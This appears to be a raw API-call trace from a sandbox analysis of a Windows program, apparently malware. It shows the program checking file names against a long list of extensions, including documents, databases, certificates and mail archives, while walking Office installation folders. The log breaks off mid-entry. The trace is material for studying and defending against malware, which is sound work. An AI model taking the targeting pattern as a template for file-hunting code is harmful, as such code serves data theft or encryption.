[0290.763] lstrlenW (lpString=".hta") returned 4 [0290.763] lstrcmpiW (lpString1=".hta", lpString2=".msi") returned -1 [0290.763] lstrlenW (lpString=".htc") returned 4 [0290.763] lstrcmpiW (lpString1=".htc", lpString2=".msi") returned -1 [0290.763] lstrlenW (lpString=".htm") returned 4 [0290.763] lstrcmpiW (lpString1=".htm", lpString2=".msi") returned -1 [0290.763] lstrlenW (lpString=".html") returned 5 [0290.763] lstrcmpiW (lpString1=".html", lpString2="6.msi") returned -1 [0290.763] lstrlenW (lpString=".icb") returned 4 [0290.763] lstrcmpiW (lpString1=".icb", lpString2=".msi") returned -1 [0290.763] lstrlenW (lpString=".ics") returned 4 [0290.763] lstrcmpiW (lpString1=".ics", lpString2=".msi") returned -1 [0290.764] lstrlenW (lpString=".iff") returned 4 [0290.764] lstrcmpiW (lpString1=".iff", lpString2=".msi") returned -1 [0290.764] lstrlenW (lpString=".inc") returned 4 [0290.764] lstrcmpiW (lpString1=".inc", lpString2=".msi") returned -1 [0290.764] lstrlenW (lpString=".indd") returned 5 [0290.764] lstrcmpiW (lpString1=".indd", lpString2="6.msi") returned -1 [0290.764] lstrlenW (lpString=".ini") returned 4 [0290.764] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0290.764] lstrlenW (lpString=".iqy") returned 4 [0290.764] lstrcmpiW (lpString1=".iqy", lpString2=".msi") returned -1 [0290.764] lstrlenW (lpString=".j2c") returned 4 [0290.764] lstrcmpiW (lpString1=".j2c", lpString2=".msi") returned -1 [0290.764] lstrlenW (lpString=".j2k") returned 4 [0290.764] lstrcmpiW (lpString1=".j2k", lpString2=".msi") returned -1 [0290.764] lstrlenW (lpString=".java") returned 5 [0290.764] lstrcmpiW (lpString1=".java", lpString2="6.msi") returned -1 [0290.764] lstrlenW (lpString=".jp2") returned 4 [0290.764] lstrcmpiW (lpString1=".jp2", lpString2=".msi") returned -1 [0290.764] lstrlenW (lpString=".jpc") returned 4 [0290.764] lstrcmpiW (lpString1=".jpc", lpString2=".msi") returned -1 [0290.764] lstrlenW (lpString=".jpe") returned 4 [0290.764] lstrcmpiW (lpString1=".jpe", lpString2=".msi") returned -1 [0290.764] lstrlenW (lpString=".jpeg") returned 5 [0290.764] lstrcmpiW (lpString1=".jpeg", lpString2="6.msi") returned -1 [0290.764] lstrlenW (lpString=".jpf") returned 4 [0290.764] lstrcmpiW (lpString1=".jpf", lpString2=".msi") returned -1 [0290.764] lstrlenW (lpString=".jpg") returned 4 [0290.765] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0290.765] lstrlenW (lpString=".jpx") returned 4 [0290.765] lstrcmpiW (lpString1=".jpx", lpString2=".msi") returned -1 [0290.765] lstrlenW (lpString=".js") returned 3 [0290.765] lstrcmpiW (lpString1=".js", lpString2="msi") returned -1 [0290.765] lstrlenW (lpString=".jsf") returned 4 [0290.765] lstrcmpiW (lpString1=".jsf", lpString2=".msi") returned -1 [0290.765] lstrlenW (lpString=".json") returned 5 [0290.765] lstrcmpiW (lpString1=".json", lpString2="6.msi") returned -1 [0290.765] lstrlenW (lpString=".jsp") returned 4 [0290.765] lstrcmpiW (lpString1=".jsp", lpString2=".msi") returned -1 [0290.765] lstrlenW (lpString=".kdc") returned 4 [0290.765] lstrcmpiW (lpString1=".kdc", lpString2=".msi") returned -1 [0290.765] lstrlenW (lpString=".kmz") returned 4 [0290.765] lstrcmpiW (lpString1=".kmz", lpString2=".msi") returned -1 [0290.765] lstrlenW (lpString=".kwm") returned 4 [0290.765] lstrcmpiW (lpString1=".kwm", lpString2=".msi") returned -1 [0290.765] lstrlenW (lpString=".lasso") returned 6 [0290.765] lstrcmpiW (lpString1=".lasso", lpString2="16.msi") returned -1 [0290.765] lstrlenW (lpString=".lbi") returned 4 [0290.765] lstrcmpiW (lpString1=".lbi", lpString2=".msi") returned -1 [0290.765] lstrlenW (lpString=".lgf") returned 4 [0290.765] lstrcmpiW (lpString1=".lgf", lpString2=".msi") returned -1 [0290.765] lstrlenW (lpString=".lgp") returned 4 [0290.765] lstrcmpiW (lpString1=".lgp", lpString2=".msi") returned -1 [0290.765] lstrlenW (lpString=".log") returned 4 [0290.765] lstrcmpiW (lpString1=".log", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".m1v") returned 4 [0290.766] lstrcmpiW (lpString1=".m1v", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".m4a") returned 4 [0290.766] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".m4v") returned 4 [0290.766] lstrcmpiW (lpString1=".m4v", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".max") returned 4 [0290.766] lstrcmpiW (lpString1=".max", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".md") returned 3 [0290.766] lstrcmpiW (lpString1=".md", lpString2="msi") returned -1 [0290.766] lstrlenW (lpString=".mda") returned 4 [0290.766] lstrcmpiW (lpString1=".mda", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".mdb") returned 4 [0290.766] lstrcmpiW (lpString1=".mdb", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".mde") returned 4 [0290.766] lstrcmpiW (lpString1=".mde", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".mdf") returned 4 [0290.766] lstrcmpiW (lpString1=".mdf", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".mdw") returned 4 [0290.766] lstrcmpiW (lpString1=".mdw", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".mef") returned 4 [0290.766] lstrcmpiW (lpString1=".mef", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".mft") returned 4 [0290.766] lstrcmpiW (lpString1=".mft", lpString2=".msi") returned -1 [0290.766] lstrlenW (lpString=".mfw") returned 4 [0290.767] lstrcmpiW (lpString1=".mfw", lpString2=".msi") returned -1 [0290.767] lstrlenW (lpString=".mht") returned 4 [0290.767] lstrcmpiW (lpString1=".mht", lpString2=".msi") returned -1 [0290.767] lstrlenW (lpString=".mhtml") returned 6 [0290.767] lstrcmpiW (lpString1=".mhtml", lpString2="16.msi") returned -1 [0290.767] lstrlenW (lpString=".mka") returned 4 [0290.767] lstrcmpiW (lpString1=".mka", lpString2=".msi") returned -1 [0290.767] lstrlenW (lpString=".mkidx") returned 6 [0290.767] lstrcmpiW (lpString1=".mkidx", lpString2="16.msi") returned -1 [0290.767] lstrlenW (lpString=".mkv") returned 4 [0290.767] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0290.767] lstrlenW (lpString=".mos") returned 4 [0290.767] lstrcmpiW (lpString1=".mos", lpString2=".msi") returned -1 [0290.767] lstrlenW (lpString=".mov") returned 4 [0290.767] lstrcmpiW (lpString1=".mov", lpString2=".msi") returned -1 [0290.767] lstrlenW (lpString=".mp3") returned 4 [0290.767] lstrcmpiW (lpString1=".mp3", lpString2=".msi") returned -1 [0290.767] lstrlenW (lpString=".mp4") returned 4 [0290.767] lstrcmpiW (lpString1=".mp4", lpString2=".msi") returned -1 [0290.767] lstrlenW (lpString=".mpeg") returned 5 [0290.767] lstrcmpiW (lpString1=".mpeg", lpString2="6.msi") returned -1 [0290.767] lstrlenW (lpString=".mpg") returned 4 [0290.767] lstrcmpiW (lpString1=".mpg", lpString2=".msi") returned -1 [0290.768] lstrlenW (lpString=".mpv") returned 4 [0290.768] lstrcmpiW (lpString1=".mpv", lpString2=".msi") returned -1 [0290.768] lstrlenW (lpString=".mrw") returned 4 [0290.768] lstrcmpiW (lpString1=".mrw", lpString2=".msi") returned -1 [0290.768] lstrlenW (lpString=".msg") returned 4 [0290.768] lstrcmpiW (lpString1=".msg", lpString2=".msi") returned -1 [0290.768] lstrlenW (lpString=".mxl") returned 4 [0290.768] lstrcmpiW (lpString1=".mxl", lpString2=".msi") returned 1 [0290.768] lstrlenW (lpString=".myd") returned 4 [0290.768] lstrcmpiW (lpString1=".myd", lpString2=".msi") returned 1 [0290.768] lstrlenW (lpString=".myi") returned 4 [0290.768] lstrcmpiW (lpString1=".myi", lpString2=".msi") returned 1 [0290.768] lstrlenW (lpString=".nef") returned 4 [0290.768] lstrcmpiW (lpString1=".nef", lpString2=".msi") returned 1 [0290.768] lstrlenW (lpString=".nrw") returned 4 [0290.768] lstrcmpiW (lpString1=".nrw", lpString2=".msi") returned 1 [0290.768] lstrlenW (lpString=".obj") returned 4 [0290.768] lstrcmpiW (lpString1=".obj", lpString2=".msi") returned 1 [0290.768] lstrlenW (lpString=".odb") returned 4 [0290.768] lstrcmpiW (lpString1=".odb", lpString2=".msi") returned 1 [0290.768] lstrlenW (lpString=".odc") returned 4 [0290.768] lstrcmpiW (lpString1=".odc", lpString2=".msi") returned 1 [0290.768] lstrlenW (lpString=".odm") returned 4 [0290.768] lstrcmpiW (lpString1=".odm", lpString2=".msi") returned 1 [0290.768] lstrlenW (lpString=".odp") returned 4 [0290.769] lstrcmpiW (lpString1=".odp", lpString2=".msi") returned 1 [0290.769] lstrlenW (lpString=".ods") returned 4 [0290.769] lstrcmpiW (lpString1=".ods", lpString2=".msi") returned 1 [0290.769] lstrlenW (lpString=".oft") returned 4 [0290.769] lstrcmpiW (lpString1=".oft", lpString2=".msi") returned 1 [0290.769] lstrlenW (lpString=".one") returned 4 [0290.769] lstrcmpiW (lpString1=".one", lpString2=".msi") returned 1 [0290.769] lstrlenW (lpString=".onepkg") returned 7 [0290.769] lstrcmpiW (lpString1=".onepkg", lpString2=".16.msi") returned 1 [0290.769] lstrlenW (lpString=".onetoc2") returned 8 [0290.769] lstrcmpiW (lpString1=".onetoc2", lpString2="t.16.msi") returned -1 [0290.769] lstrlenW (lpString=".opt") returned 4 [0290.769] lstrcmpiW (lpString1=".opt", lpString2=".msi") returned 1 [0290.769] lstrlenW (lpString=".oqy") returned 4 [0290.769] lstrcmpiW (lpString1=".oqy", lpString2=".msi") returned 1 [0290.769] lstrlenW (lpString=".orf") returned 4 [0290.769] lstrcmpiW (lpString1=".orf", lpString2=".msi") returned 1 [0290.769] lstrlenW (lpString=".p12") returned 4 [0290.769] lstrcmpiW (lpString1=".p12", lpString2=".msi") returned 1 [0290.769] lstrlenW (lpString=".p7b") returned 4 [0290.769] lstrcmpiW (lpString1=".p7b", lpString2=".msi") returned 1 [0290.769] lstrlenW (lpString=".p7c") returned 4 [0290.769] lstrcmpiW (lpString1=".p7c", lpString2=".msi") returned 1 [0290.769] lstrlenW (lpString=".pam") returned 4 [0290.769] lstrcmpiW (lpString1=".pam", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pbm") returned 4 [0290.770] lstrcmpiW (lpString1=".pbm", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pct") returned 4 [0290.770] lstrcmpiW (lpString1=".pct", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pcx") returned 4 [0290.770] lstrcmpiW (lpString1=".pcx", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pdd") returned 4 [0290.770] lstrcmpiW (lpString1=".pdd", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pdf") returned 4 [0290.770] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pdp") returned 4 [0290.770] lstrcmpiW (lpString1=".pdp", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pef") returned 4 [0290.770] lstrcmpiW (lpString1=".pef", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pem") returned 4 [0290.770] lstrcmpiW (lpString1=".pem", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pff") returned 4 [0290.770] lstrcmpiW (lpString1=".pff", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pfm") returned 4 [0290.770] lstrcmpiW (lpString1=".pfm", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pfx") returned 4 [0290.770] lstrcmpiW (lpString1=".pfx", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".pgm") returned 4 [0290.770] lstrcmpiW (lpString1=".pgm", lpString2=".msi") returned 1 [0290.770] lstrlenW (lpString=".php") returned 4 [0290.770] lstrcmpiW (lpString1=".php", lpString2=".msi") returned 1 [0290.771] lstrlenW (lpString=".php3") returned 5 [0290.771] lstrcmpiW (lpString1=".php3", lpString2="6.msi") returned -1 [0290.771] lstrlenW (lpString=".php4") returned 5 [0290.771] lstrcmpiW (lpString1=".php4", lpString2="6.msi") returned -1 [0290.772] lstrlenW (lpString=".php5") returned 5 [0290.772] lstrcmpiW (lpString1=".php5", lpString2="6.msi") returned -1 [0290.772] lstrlenW (lpString=".phtml") returned 6 [0290.772] lstrcmpiW (lpString1=".phtml", lpString2="16.msi") returned -1 [0290.772] lstrlenW (lpString=".pict") returned 5 [0290.772] lstrcmpiW (lpString1=".pict", lpString2="6.msi") returned -1 [0290.772] lstrlenW (lpString=".pl") returned 3 [0290.772] lstrcmpiW (lpString1=".pl", lpString2="msi") returned -1 [0290.772] lstrlenW (lpString=".pls") returned 4 [0290.772] lstrcmpiW (lpString1=".pls", lpString2=".msi") returned 1 [0290.772] lstrlenW (lpString=".pm") returned 3 [0290.772] lstrcmpiW (lpString1=".pm", lpString2="msi") returned -1 [0290.772] lstrlenW (lpString=".png") returned 4 [0290.772] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0290.772] lstrlenW (lpString=".pnm") returned 4 [0290.772] lstrcmpiW (lpString1=".pnm", lpString2=".msi") returned 1 [0290.772] lstrlenW (lpString=".pot") returned 4 [0290.772] lstrcmpiW (lpString1=".pot", lpString2=".msi") returned 1 [0290.772] lstrlenW (lpString=".potm") returned 5 [0290.772] lstrcmpiW (lpString1=".potm", lpString2="6.msi") returned -1 [0290.772] lstrlenW (lpString=".potx") returned 5 [0290.772] lstrcmpiW (lpString1=".potx", lpString2="6.msi") returned -1 [0290.772] lstrlenW (lpString=".ppa") returned 4 [0290.772] lstrcmpiW (lpString1=".ppa", lpString2=".msi") returned 1 [0290.773] lstrlenW (lpString=".ppam") returned 5 [0290.773] lstrcmpiW (lpString1=".ppam", lpString2="6.msi") returned -1 [0290.773] lstrlenW (lpString=".ppm") returned 4 [0290.773] lstrcmpiW (lpString1=".ppm", lpString2=".msi") returned 1 [0290.773] lstrlenW (lpString=".pps") returned 4 [0290.773] lstrcmpiW (lpString1=".pps", lpString2=".msi") returned 1 [0290.773] lstrlenW (lpString=".ppsm") returned 5 [0290.773] lstrcmpiW (lpString1=".ppsm", lpString2="6.msi") returned -1 [0290.773] lstrlenW (lpString=".ppt") returned 4 [0290.773] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0290.773] lstrlenW (lpString=".pptm") returned 5 [0290.773] lstrcmpiW (lpString1=".pptm", lpString2="6.msi") returned -1 [0290.773] lstrlenW (lpString=".pptx") returned 5 [0290.773] lstrcmpiW (lpString1=".pptx", lpString2="6.msi") returned -1 [0290.773] lstrlenW (lpString=".prn") returned 4 [0290.773] lstrcmpiW (lpString1=".prn", lpString2=".msi") returned 1 [0290.773] lstrlenW (lpString=".ps") returned 3 [0290.773] lstrcmpiW (lpString1=".ps", lpString2="msi") returned -1 [0290.773] lstrlenW (lpString=".psb") returned 4 [0290.773] lstrcmpiW (lpString1=".psb", lpString2=".msi") returned 1 [0290.773] lstrlenW (lpString=".psd") returned 4 [0290.773] lstrcmpiW (lpString1=".psd", lpString2=".msi") returned 1 [0290.773] lstrlenW (lpString=".pst") returned 4 [0290.773] lstrcmpiW (lpString1=".pst", lpString2=".msi") returned 1 [0290.773] lstrlenW (lpString=".ptx") returned 4 [0290.773] lstrcmpiW (lpString1=".ptx", lpString2=".msi") returned 1 [0290.773] lstrlenW (lpString=".pub") returned 4 [0290.774] lstrcmpiW (lpString1=".pub", lpString2=".msi") returned 1 [0290.774] lstrlenW (lpString=".pwm") returned 4 [0290.774] lstrcmpiW (lpString1=".pwm", lpString2=".msi") returned 1 [0290.774] lstrlenW (lpString=".pxr") returned 4 [0290.774] lstrcmpiW (lpString1=".pxr", lpString2=".msi") returned 1 [0290.774] lstrlenW (lpString=".py") returned 3 [0290.774] lstrcmpiW (lpString1=".py", lpString2="msi") returned -1 [0290.774] lstrlenW (lpString=".qt") returned 3 [0290.774] lstrcmpiW (lpString1=".qt", lpString2="msi") returned -1 [0290.774] lstrlenW (lpString=".r3d") returned 4 [0290.774] lstrcmpiW (lpString1=".r3d", lpString2=".msi") returned 1 [0290.779] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0290.779] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2687c83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee308135, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee308135, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Licenses16", cAlternateFileName="LICENS~1")) returned 1 [0291.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0291.617] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee45f66d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x983c2c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="loc", cAlternateFileName="")) returned 1 [0291.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0291.617] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mcxml", cAlternateFileName="")) returned 1 [0291.933] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0291.933] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99dfc61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99dfc61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0291.937] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0291.937] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99473dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0291.938] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0291.938] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b9607ff, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="x-none", cAlternateFileName="")) returned 1 [0291.943] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0291.943] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b9607ff, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="x-none", cAlternateFileName="")) returned 0 [0291.944] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0291.944] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0291.944] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3c29db74, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c29db74, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Office16", cAlternateFileName="")) returned 1 [0292.170] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0292.170] FindNextFileW (in: hFindFile=0x39482a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a96a42, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1a96a42, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1abcabc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xde78, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="BSTORM.VSL", cAlternateFileName="")) returned 1 [0292.179] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0292.179] FindNextFileW (in: hFindFile=0x39482a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x45a7036, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x45a7036, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4619706, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DBSAMPLE.MDB", cAlternateFileName="")) returned 1 [0292.186] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40d7ef8 | out: hHeap=0x470000) returned 1 [0292.186] FindNextFileW (in: hFindFile=0x39482a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PUBSPAPR", cAlternateFileName="")) returned 1 [0292.188] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x40e7f00, Size=0x80000) returned 0x4708020 [0292.197] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7d5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDIR41F.GIF", cAlternateFileName="")) returned 1 [0292.200] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40d7ef8 | out: hHeap=0x470000) returned 1 [0292.201] FindNextFileW (in: hFindFile=0x39482a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc79af6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc79af6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7c11d2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1fc48, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PUBWZINT.DLL", cAlternateFileName="")) returned 1 [0292.205] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40d7ef8 | out: hHeap=0x470000) returned 1 [0292.205] FindNextFileW (in: hFindFile=0x39482a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x42ca, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ReviewRouting_Init.xsn", cAlternateFileName="REVIEW~1.XSN")) returned 1 [0292.415] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c7ef0 | out: hHeap=0x470000) returned 1 [0292.415] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d440f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0292.416] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c7ef0 | out: hHeap=0x470000) returned 1 [0292.417] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d440f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0292.417] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c7ef0 | out: hHeap=0x470000) returned 1 [0292.417] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x12985c4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="AccessWeb", cAlternateFileName="ACCESS~1")) returned 1 [0292.418] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c7ef0 | out: hHeap=0x470000) returned 1 [0292.418] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: 